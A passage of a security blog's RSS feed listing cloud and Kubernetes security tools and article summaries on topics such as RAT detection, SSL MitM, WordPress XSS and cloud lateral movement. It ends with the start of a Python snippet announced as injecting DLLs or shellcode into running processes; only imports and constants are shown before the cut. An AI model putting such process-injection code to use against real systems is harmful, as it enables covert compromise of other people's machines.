      <description></description>
    </item>
    <item>
      <title>helm-freeze</title>
      <link>https://cloudberry.engineering/tool/helm-freeze/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/helm-freeze/</guid>
      <description></description>
    </item>
    <item>
      <title>http-desync-guardian</title>
      <link>https://cloudberry.engineering/tool/http-desync-guardian/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/http-desync-guardian/</guid>
      <description></description>
    </item>
    <item>
      <title>iam-policies-cli</title>
      <link>https://cloudberry.engineering/tool/iam-policies-cli/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/iam-policies-cli/</guid>
      <description></description>
    </item>
    <item>
      <title>infracost</title>
      <link>https://cloudberry.engineering/tool/infracost/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/infracost/</guid>
      <description></description>
    </item>
    <item>
      <title>k8s-audit-log-inspector</title>
      <link>https://cloudberry.engineering/tool/k8s-audit-log-inspector/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/k8s-audit-log-inspector/</guid>
      <description></description>
    </item>
    <item>
      <title>k8s-diagrams</title>
      <link>https://cloudberry.engineering/tool/k8s-diagrams/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/k8s-diagrams/</guid>
      <description></description>
    </item>
    <item>
      <title>k8s-snapshots</title>
      <link>https://cloudberry.engineering/tool/k8s-snapshots/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/k8s-snapshots/</guid>
      <description></description>
    </item>
    <item>
      <title>kconmon</title>
      <link>https://cloudberry.engineering/tool/kconmon/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/kconmon/</guid>
      <description></description>
    </item>
    <item>
      <title>kconnect</title>
      <link>https://cloudberry.engineering/tool/kconnect/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/kconnect/</guid>
      <description></description>
    </item>
    <item>
      <title>kip</title>
      <link>https://cloudberry.engineering/tool/kip/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/kip/</guid>
      <description></description>
    </item>
    <item>
      <title>konstraint</title>
      <link>https://cloudberry.engineering/tool/konstraint/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/konstraint/</guid>
      <description></description>
    </item>
    <item>
      <title>krane</title>
      <link>https://cloudberry.engineering/tool/krane/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/krane/</guid>
      <description></description>
    </item>
    <item>
      <title>kube-fluentd-operator</title>
      <link>https://cloudberry.engineering/tool/kube-fluentd-operator/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/kube-fluentd-operator/</guid>
      <description></description>
    </item>
    <item>
      <title>kube-forensics</title>
      <link>https://cloudberry.engineering/tool/kube-forensics/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/kube-forensics/</guid>
      <description></description>
    </item>
    <item>
      <title>kube-janitor</title>
      <link>https://cloudberry.engineering/tool/kube-janitor/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/kube-janitor/</guid>
      <description></description>
    </item>
    <item>
      <title>kube-prometheus</title>
      <link>https://cloudberry.engineering/tool/kube-prometheus/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/kube-prometheus/</guid>
      <description></description>
    </item>
    <item>
      <title>kubectl-fuzzy</title>
      <link>https://cloudberry.engineering/tool/kubectl-fuzzy/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/kubectl-fuzzy/</guid>
      <description></description>
    </item>
    <item>
      <title>kubectl-images</title>
      <link>https://cloudberry.engineering/tool/kubectl-images/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/kubectl-images/</guid>
      <description></description>
    </item>
    <item>
      <title>kubefs</title>
      <link>https://cloudberry.engineering/tool/kubefs/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/kubefs/</guid>
      <description></description>
    </item>
    <item>
      <title>kubei</title>
      <link>https://cloudberry.engineering/tool/kubei/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/kubei/</guid>
      <description></description>
    </item>
    <item>
      <title>kuberhealthy</title>
      <link>https://cloudberry.engineering/tool/kuberhealthy/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/kuberhealthy/</guid>
      <description></description>
    </item>
    <item>
      <title>kubernetes-examples</title>
      <link>https://cloudberry.engineering/tool/kubernetes-examples/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/kubernetes-examples/</guid>
      <description></description>
    </item>
    <item>
      <title>kubernetes-goat</title>
      <link>https://cloudberry.engineering/tool/kubernetes-goat/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/kubernetes-goat/</guid>
      <description></description>
    </item>
    <item>
      <title>litmus</title>
      <link>https://cloudberry.engineering/tool/litmus/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/litmus/</guid>
      <description></description>
    </item>
    <item>
      <title>lsh</title>
      <link>https://cloudberry.engineering/tool/lsh/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/lsh/</guid>
      <description></description>
    </item>
    <item>
      <title>opa-image-scanner</title>
      <link>https://cloudberry.engineering/tool/opa-image-scanner/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/opa-image-scanner/</guid>
      <description></description>
    </item>
    <item>
      <title>PowerZure</title>
      <link>https://cloudberry.engineering/tool/powerzure/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/powerzure/</guid>
      <description></description>
    </item>
    <item>
      <title>professional-services</title>
      <link>https://cloudberry.engineering/tool/professional-services/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/professional-services/</guid>
      <description></description>
    </item>
    <item>
      <title>rego-policies</title>
      <link>https://cloudberry.engineering/tool/rego-policies/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/rego-policies/</guid>
      <description></description>
    </item>
    <item>
      <title>regula</title>
      <link>https://cloudberry.engineering/tool/regula/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/regula/</guid>
      <description></description>
    </item>
    <item>
      <title>rode</title>
      <link>https://cloudberry.engineering/tool/rode/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/rode/</guid>
      <description></description>
    </item>
    <item>
      <title>secrets-store-csi-driver-provider-azure</title>
      <link>https://cloudberry.engineering/tool/secrets-store-csi-driver-provider-azure/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/secrets-store-csi-driver-provider-azure/</guid>
      <description></description>
    </item>
    <item>
      <title>SFPolDevChk</title>
      <link>https://cloudberry.engineering/tool/sfpoldevchk/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/sfpoldevchk/</guid>
      <description></description>
    </item>
    <item>
      <title>SimuLand</title>
      <link>https://cloudberry.engineering/tool/simuland/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/simuland/</guid>
      <description></description>
    </item>
    <item>
      <title>sinker</title>
      <link>https://cloudberry.engineering/tool/sinker/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/sinker/</guid>
      <description></description>
    </item>
    <item>
      <title>SkyArk</title>
      <link>https://cloudberry.engineering/tool/skyark/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/skyark/</guid>
      <description></description>
    </item>
    <item>
      <title>spacesiren</title>
      <link>https://cloudberry.engineering/tool/spacesiren/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/spacesiren/</guid>
      <description></description>
    </item>
    <item>
      <title>starboard</title>
      <link>https://cloudberry.engineering/tool/starboard/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/starboard/</guid>
      <description></description>
    </item>
    <item>
      <title>starboard-octant-plugin</title>
      <link>https://cloudberry.engineering/tool/starboard-octant-plugin/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/starboard-octant-plugin/</guid>
      <description></description>
    </item>
    <item>
      <title>stash</title>
      <link>https://cloudberry.engineering/tool/stash/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/stash/</guid>
      <description></description>
    </item>
    <item>
      <title>Stormspotter</title>
      <link>https://cloudberry.engineering/tool/stormspotter/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/stormspotter/</guid>
      <description></description>
    </item>
    <item>
      <title>syft</title>
      <link>https://cloudberry.engineering/tool/syft/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/syft/</guid>
      <description></description>
    </item>
    <item>
      <title>synator</title>
      <link>https://cloudberry.engineering/tool/synator/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/synator/</guid>
      <description></description>
    </item>
    <item>
      <title>talisman</title>
      <link>https://cloudberry.engineering/tool/talisman/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/talisman/</guid>
      <description></description>
    </item>
    <item>
      <title>terragoat</title>
      <link>https://cloudberry.engineering/tool/terragoat/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/terragoat/</guid>
      <description></description>
    </item>
    <item>
      <title>trailscraper</title>
      <link>https://cloudberry.engineering/tool/trailscraper/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/trailscraper/</guid>
      <description></description>
    </item>
    <item>
      <title>tunshell</title>
      <link>https://cloudberry.engineering/tool/tunshell/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/tunshell/</guid>
      <description></description>
    </item>
    <item>
      <title>vector</title>
      <link>https://cloudberry.engineering/tool/vector/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/vector/</guid>
      <description></description>
    </item>
    <item>
      <title>version-checker</title>
      <link>https://cloudberry.engineering/tool/version-checker/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/version-checker/</guid>
      <description></description>
    </item>
    <item>
      <title>whalescan</title>
      <link>https://cloudberry.engineering/tool/whalescan/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/whalescan/</guid>
      <description></description>
    </item>
    <item>
      <title>whispers</title>
      <link>https://cloudberry.engineering/tool/whispers/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/whispers/</guid>
      <description></description>
    </item>
    <item>
      <title>How to find and delete idle GCP Projects</title>
      <link>https://cloudberry.engineering/article/find-and-delete-idle-gcp-projects/</link>
      <pubDate>Sun, 11 Oct 2020 11:15:51 +0200</pubDate>
      <guid>https://cloudberry.engineering/article/find-and-delete-idle-gcp-projects/</guid>
      <description>&lt;p&gt;A constant source of pain in Google Cloud Platform (GCP) and everywhere else is the amount of unmaintained resources: idle virtual machines, old buckets, IAM policies, DNS records and so on. They contribute to the attack surface and the chance of a vulnerability increase with time.&lt;/p&gt;&#xA;&lt;p&gt;Shutting off resources is a such a low hanging fruit from a risk perspective that as a security engineer you should make it a daily habit.&lt;/p&gt;&#xA;&lt;p&gt;After all the most secure computer is the one that’s been turned off!&lt;/p&gt;</description>
    </item>
    <item>
      <title>Docker Security Best Practices from the Dockerfile</title>
      <link>https://cloudberry.engineering/article/dockerfile-security-best-practices/</link>
      <pubDate>Sun, 04 Oct 2020 23:32:41 +0200</pubDate>
      <guid>https://cloudberry.engineering/article/dockerfile-security-best-practices/</guid>
      <description>&lt;p&gt;Docker and &lt;a href=&#34;https://cloudberry.engineering/article/practical-introduction-container-security/&#34;&gt;container security&lt;/a&gt; are broad problem spaces and there are many low hanging fruits one can harvest to mitigate risks. A good starting point is to follow some best practices when writing Dockerfiles.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Shared Responsibility Models for Public Clouds</title>
      <link>https://cloudberry.engineering/article/shared-responsibility-models/</link>
      <pubDate>Sat, 26 Sep 2020 00:00:00 +0200</pubDate>
      <guid>https://cloudberry.engineering/article/shared-responsibility-models/</guid>
      <description>&lt;p&gt;Public cloud providers share some security responsibility with their customers. This means that as a security practitioner, what you should take into account in your threat model is going to be different in the cloud than on premise environments.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Lateral Movement in the Cloud</title>
      <link>https://cloudberry.engineering/article/lateral-movement-cloud/</link>
      <pubDate>Thu, 17 Sep 2020 00:53:55 +0200</pubDate>
      <guid>https://cloudberry.engineering/article/lateral-movement-cloud/</guid>
      <description>&lt;p&gt;In the context of incident response lateral movement is how attackers are able to penetrate deeper inside a system. Understanding this concept is critical to contain an ongoing breach.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Stricter Access Control to Google Cloud Registry</title>
      <link>https://cloudberry.engineering/article/stricter-access-control-to-gcr/</link>
      <pubDate>Tue, 08 Sep 2020 00:53:55 +0200</pubDate>
      <guid>https://cloudberry.engineering/article/stricter-access-control-to-gcr/</guid>
      <description>&lt;p&gt;Google Cloud Registry (GCR) is the Docker container registry offered by Google Cloud Platform (GCP). Under the hood it&amp;rsquo;s an interface on top of Google Cloud Storage (GCS), and it’s so thin that access control is entirely delegated to the storage layer.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Archive</title>
      <link>https://cloudberry.engineering/archives/</link>
      <pubDate>Tue, 28 May 2019 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/archives/</guid>
      <description></description>
    </item>
    <item>
      <title>TR19: Distributed Security Alerting</title>
      <link>https://cloudberry.engineering/note/tr19-distributed-security-alerting/</link>
      <pubDate>Mon, 01 Apr 2019 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/note/tr19-distributed-security-alerting/</guid>
      <description>&lt;p&gt;&lt;strong&gt;Video:&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;div style=&#34;position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;&#34;&gt;&#xA;      &lt;iframe allow=&#34;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen&#34; loading=&#34;eager&#34; referrerpolicy=&#34;strict-origin-when-cross-origin&#34; src=&#34;https://www.youtube.com/embed/DPROA-6sa3o?autoplay=0&amp;amp;controls=1&amp;amp;end=0&amp;amp;loop=0&amp;amp;mute=0&amp;amp;start=0&#34; style=&#34;position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;&#34; title=&#34;YouTube video&#34;&gt;&lt;/iframe&gt;&#xA;    &lt;/div&gt;&#xA;&#xA;&lt;p&gt;Also available &lt;a href=&#34;https://troopers.de/troopers19/agenda/bpnbqm/&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Forseti: Stepping Up the Cloud Security Game</title>
      <link>https://cloudberry.engineering/article/forseti-stepping-up-cloud-security/</link>
      <pubDate>Fri, 15 Sep 2017 12:15:09 +0200</pubDate>
      <guid>https://cloudberry.engineering/article/forseti-stepping-up-cloud-security/</guid>
      <description>&lt;p&gt;Securing our Cloud infrastructure is incredibly important. We are now taking another step forward by leveraging open source tools we developed in partnership with Google.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Google Cloud Security Toolbox</title>
      <link>https://cloudberry.engineering/article/google-cloud-security-toolbox/</link>
      <pubDate>Wed, 22 Feb 2017 12:27:54 +0200</pubDate>
      <guid>https://cloudberry.engineering/article/google-cloud-security-toolbox/</guid>
      <description>&lt;p&gt;At Spotify, we actively manage more than 800 Google Cloud Platform projects. As such, maintaining a proper security posture at scale has proven to be a challenging task. In an effort to seamlessly audit and strengthen the security stance of our massive cloud infrastructure, we are investing various resources into building our own tools and methodologies.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Advanced Techniques for Detecting RAT Screen Control</title>
      <link>https://cloudberry.engineering/article/advanced-techniques-for-detecting-rat-screen-control/</link>
      <pubDate>Fri, 05 Feb 2016 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/article/advanced-techniques-for-detecting-rat-screen-control/</guid>
      <description>&lt;h1 id=&#34;rat-wars-20-advanced-techniques-for-detecting-rat-screen-control&#34;&gt;RAT WARS 2.0: Advanced Techniques for Detecting RAT Screen Control&lt;/h1&gt;&#xA;&lt;p&gt;In the landscape of web maliciousness Remote Administration Trojans &lt;a href=&#34;%5Bhttps://en.wikipedia.org/wiki/Remote_administration_software%5D(https://en.wikipedia.org/wiki/Remote_administration_software)&#34;&gt;1&lt;/a&gt; are not a new trend but their usage is still strong and growing steady.&lt;/p&gt;&#xA;&lt;p&gt;At its core a RAT is a backdoor facility used to let an attacker enter unnoticed into the victim computer to control it remotely: for example most banking trojan nowadays are using remote desktop modules to open a VNC/RDP channel to allow an attacker to exfiltrate the money from within the users browser inside its legit session.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Beyond Superfish: a Journey on SSL MitM in the Wild</title>
      <link>https://cloudberry.engineering/article/beyond-superfish-a-journey-on-ssl-mitm-in-the-wild/</link>
      <pubDate>Thu, 09 Apr 2015 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/article/beyond-superfish-a-journey-on-ssl-mitm-in-the-wild/</guid>
      <description>&lt;h1 id=&#34;beyond-superfish-a-journey-on-ssl-mitm-in-the-wild&#34;&gt;Beyond Superfish: a Journey on SSL MitM in the Wild&lt;/h1&gt;&#xA;&lt;p&gt;Recently Lenovo hit the news because they got caught installing adware on their laptops, namely Superfish, which, amongst other features, also perform SSL Mitm on the infected computer.&lt;/p&gt;&#xA;&lt;p&gt;Unfortunately, Superfish is not the only one that has been caught nullifying end-to-end SSL encryption. Many other software and services are turning this &amp;ldquo;feature&amp;rdquo; into a nightmare: result is that nowadays SSL Man in the Middle is not an uncommon scenario at all.&lt;/p&gt;</description>
    </item>
    <item>
      <title>FakeCommerce, an exercise in OSINT</title>
      <link>https://cloudberry.engineering/article/fakecommerce-an-exercise-in-osint/</link>
      <pubDate>Sat, 28 Feb 2015 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/article/fakecommerce-an-exercise-in-osint/</guid>
      <description>&lt;p&gt;I&amp;rsquo;ve been contacted by a friend seeking for help: he bought something on a random ecommerce and after 30 days nothing was shipped and no one was replying to his emails. He wanted to know if he had been scammed.&lt;/p&gt;&#xA;&lt;p&gt;In the end the item arrived and the ecommerce proven to be somehow legit and the &lt;code&gt;FakeCommerce&lt;/code&gt; label might be a bit sensationalistc.&#xA;Anyhow the quick investigation I performed was a good OSINT exercise worth a share.&lt;/p&gt;</description>
    </item>
    <item>
      <title>WordCamp Italy 2013: Lo Stato della Sicurezza nell&#39;Ecosistema di Wordpress</title>
      <link>https://cloudberry.engineering/note/wordcamp-italy-2013-wordpress-security/</link>
      <pubDate>Tue, 19 Mar 2013 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/note/wordcamp-italy-2013-wordpress-security/</guid>
      <description>&lt;p&gt;&lt;strong&gt;Video:&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;div style=&#34;position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;&#34;&gt;&#xA;      &lt;iframe allow=&#34;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen&#34; loading=&#34;eager&#34; referrerpolicy=&#34;strict-origin-when-cross-origin&#34; src=&#34;https://www.youtube.com/embed/NeDahAPhBzY?autoplay=0&amp;amp;controls=1&amp;amp;end=0&amp;amp;loop=0&amp;amp;mute=0&amp;amp;start=0&#34; style=&#34;position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;&#34; title=&#34;YouTube video&#34;&gt;&lt;/iframe&gt;&#xA;    &lt;/div&gt;&#xA;&#xA;&lt;p&gt;Also available on &lt;a href=&#34;http://wordpress.tv/2013/12/03/gianluca-brindisi-lo-stato-attuale-della-sicurezza-nellecosistema-di-wordpress/&#34;&gt;WordPress.tv&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Slides:&lt;/strong&gt; Available on &lt;a href=&#34;http://www.slideshare.net/slideshow/embed_code/16490936&#34;&gt;SlideShare&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Vulnerable SWF Bundled in 40 Wordpress Plugins</title>
      <link>https://cloudberry.engineering/article/vulnerable-swf-bundled-in-wordpress-plugins/</link>
      <pubDate>Thu, 22 Nov 2012 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/article/vulnerable-swf-bundled-in-wordpress-plugins/</guid>
      <description>&lt;p&gt;As stated on &lt;a href=&#34;http://seclists.org/fulldisclosure/2012/Nov/51&#34;&gt;this announcement&lt;/a&gt; on Full Disclosure every major old versions of Wordpress (from 2.5 to 3.3.1) was bundling a SWF applet named &lt;code&gt;swfupload.swf&lt;/code&gt; which is vulnerable to XSS. The original hole was &lt;a href=&#34;https://nealpoole.com/blog/2012/05/xss-and-csrf-via-swf-applets-swfupload-plupload/&#34;&gt;found by Neal Poole&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Together with &lt;a href=&#34;http://www.ethicalhack3r.co.uk/&#34;&gt;Ryan&lt;/a&gt; we investigated a little on this issue and after perfoming a quick dork on google he noticed that a few Wordpress plugins were bundling the very same vulnerable applet.&lt;/p&gt;&#xA;&lt;p&gt;To spot all the affected plugins I wrote a quick crawl and ran it against the public Wordpress SVN plugin repository and, without much surprise, we discovered a total of 40 plugins which included the vulnerable swf:&lt;/p&gt;</description>
    </item>
    <item>
      <title>DOM XSS Honeypot</title>
      <link>https://cloudberry.engineering/article/dom-xss-honeypot/</link>
      <pubDate>Sun, 26 Aug 2012 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/article/dom-xss-honeypot/</guid>
      <description>&lt;p&gt;While playing around looking for a way to catch xss exploitation on a web application honeypot I&amp;rsquo;ve stumbled on the the problem of logging DOM XSS injections performed in the fragment portion of the URL.&lt;/p&gt;&#xA;&lt;p&gt;As specified by the &lt;a href=&#34;http://tools.ietf.org/html/rfc3986#section-3.5&#34;&gt;RFCs&lt;/a&gt; browsers are not required to send the fragment to the server since it should be used only for client-side purposes. This is a problem in a scenario where a web app honeypot is involved because we would want to log everything that could expose a potential attack.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Hunting Wordpress Exploitation in the Wild</title>
      <link>https://cloudberry.engineering/article/hunting-wordpress-exploitation-in-the-wild/</link>
      <pubDate>Tue, 14 Aug 2012 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/article/hunting-wordpress-exploitation-in-the-wild/</guid>
      <description>&lt;p&gt;A thing I noticed working day by day on &lt;a href=&#34;https://github.com/wpscanteam/wpscan/tree/master/data&#34;&gt;WPScan&amp;rsquo;s vulnerability database&lt;/a&gt; is that many of the Wordpress (plugins) vulns disclosed are far less than the actual number of exploitable plugins.&#xA;A quick trip on the &lt;a href=&#34;https://github.com/wpscanteam/wpscan/tree/master/data&#34;&gt;official directory&lt;/a&gt; and a little browsing over the svn repositories will point out a lot of trivial bugs which might be worth an advisory. I am talking about low hanging fruits like unsophisticated xss and basic sqli.&lt;/p&gt;</description>
    </item>
    <item>
      <title>DLL and Code Injection in Python</title>
      <link>https://cloudberry.engineering/article/dll-and-code-injection-in-python/</link>
      <pubDate>Wed, 30 May 2012 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/article/dll-and-code-injection-in-python/</guid>
      <description>&lt;p&gt;Snippet time! Two simple functions to inject DLL or shellcodes into running processes (x86).&lt;/p&gt;&#xA;&lt;p&gt;Enjoy:&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#272822;background-color:#fafafa;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-python&#34; data-lang=&#34;python&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;import&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;sys&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;from&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;ctypes&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;import&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;*&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#111&#34;&gt;PAGE_READWRITE&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#ae81ff&#34;&gt;0x04&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#111&#34;&gt;PAGE_EXECUTE_READWRITE&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#ae81ff&#34;&gt;0x00000040&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#111&#34;&gt;DELETE&lt;/span&gt;          &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#ae81ff&#34;&gt;0x00010000&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#111&#34;&gt;READ_CONTROL&lt;/span&gt;    &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#ae81ff&#34;&gt;0x00020000&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#111&#34;&gt;WRITE_DAC&lt;/span&gt;       &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#ae81ff&#34;&gt;0x00040000&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#111&#34;&gt;WRITE_OWNER&lt;/span&gt;     &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#ae81ff&#34;&gt;0x00080000&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#111&#34;&gt;SYNCHRONIZE&lt;/span&gt;     &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#ae81ff&#34;&gt;0x00100000&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span 